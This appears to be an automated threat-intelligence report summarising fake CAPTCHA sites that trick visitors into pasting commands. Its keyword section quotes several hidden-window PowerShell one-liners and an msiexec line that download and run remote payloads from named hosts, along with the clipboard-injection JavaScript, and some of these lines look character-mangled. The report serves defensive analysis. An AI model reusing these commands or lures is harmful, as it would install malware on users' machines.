ClickGrab Threat Analysis Report - 2025-12-07
Generated on 2025-12-07 02:52:18
Executive Summary
- Total sites analyzed: 24
- Sites with malicious content: 11
- Unique domains encountered: 23
- Total URLs extracted: 102
- PowerShell download attempts: 1
- Clipboard manipulation instances: 63
Domain Analysis
Most Frequently Encountered Domains
- www.google.com: 12 occurrences
- www.webgo.de: 10 occurrences
- i.postimg.cc: 9 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- icons.duckduckgo.com: 8 occurrences
- ${host}: 8 occurrences
- api.whatsapp.com: 6 occurrences
- t.me: 4 occurrences
- mc.yandex.ru: 4 occurrences
- penguinpublishers.org: 4 occurrences
- use.fontawesome.com: 2 occurrences
- vk.com: 2 occurrences
- www.facebook.com: 2 occurrences
- ok.ru: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
5 occurrences across 3 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(1 times)
Font resources
2 occurrences across 1 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)
CDN hosted scripts
1 occurrences across 1 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)
Google resources
14 occurrences across 5 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(8 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://www.google.com/intl/en/policies/privacy/(1 times)https://www.google.com/intl/en/policies/terms/(1 times)
Suspicious Keyword Analysis
Total Keywords Found: 215 (38 unique)
Keyword Categories
Social Engineering
21 unique keywords
verificationVerification IDverification idexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";Robotcommand = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";CAPTCHA VerificationrobotI am not a robotChecking if you are human- ...and 11 more
System Commands
9 unique keywords
cmdexec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\Downioads\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";COMMAND - Jake's prank payioadcmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;";`cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";`const command =command =cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\Downioads\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;";exec(
Verification Text
3 unique keywords
hiddenray idHidden
Technical Terms
5 unique keywords
failed_to_retrieveBypassiexRay ID.exe
Most Frequent Keywords
- robot: 13 occurrences
- hidden: 13 occurrences
- CAPTCHA Verification: 11 occurrences
- I am not a robot: 11 occurrences
- Robot: 11 occurrences
- Verification: 11 occurrences
- verification: 11 occurrences
- verification-id: 11 occurrences
- To better prove you are not a robot: 11 occurrences
- Verification ID: 10 occurrences
- Ray ID: 9 occurrences
- Checking if you are human: 9 occurrences
- Verify you are human: 9 occurrences
- const command =: 9 occurrences
- verification id: 8 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: CAPTCHA Verification, Verification, verification
Group 2: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 3: Robot, robot
Group 4: Hidden, hidden
Group 5: Verify You Are Human, Checking if you are human, Verify you are human
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
au/smartdetection/deviceverification/CF/path/captc...com/i23/cioudfiare/verify/humanverfification/cioud...com/dist/web/assets/google04eaf34f590b010fe8bc0b2436182c8f065d73962211dea52d6d3d7b2cf99bdd
Clipboard Manipulation Analysis
Detected clipboard manipulation in 63 instances.
Document.Execcommand Copy
Found in 34 snippets (54.0% of clipboard code)
Examples:
try { document.execCommand('copy')
document.execCommand('copy')
document.execCommand("copy")
Textarea Manipulation
Found in 34 snippets (54.0% of clipboard code)
Examples:
ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.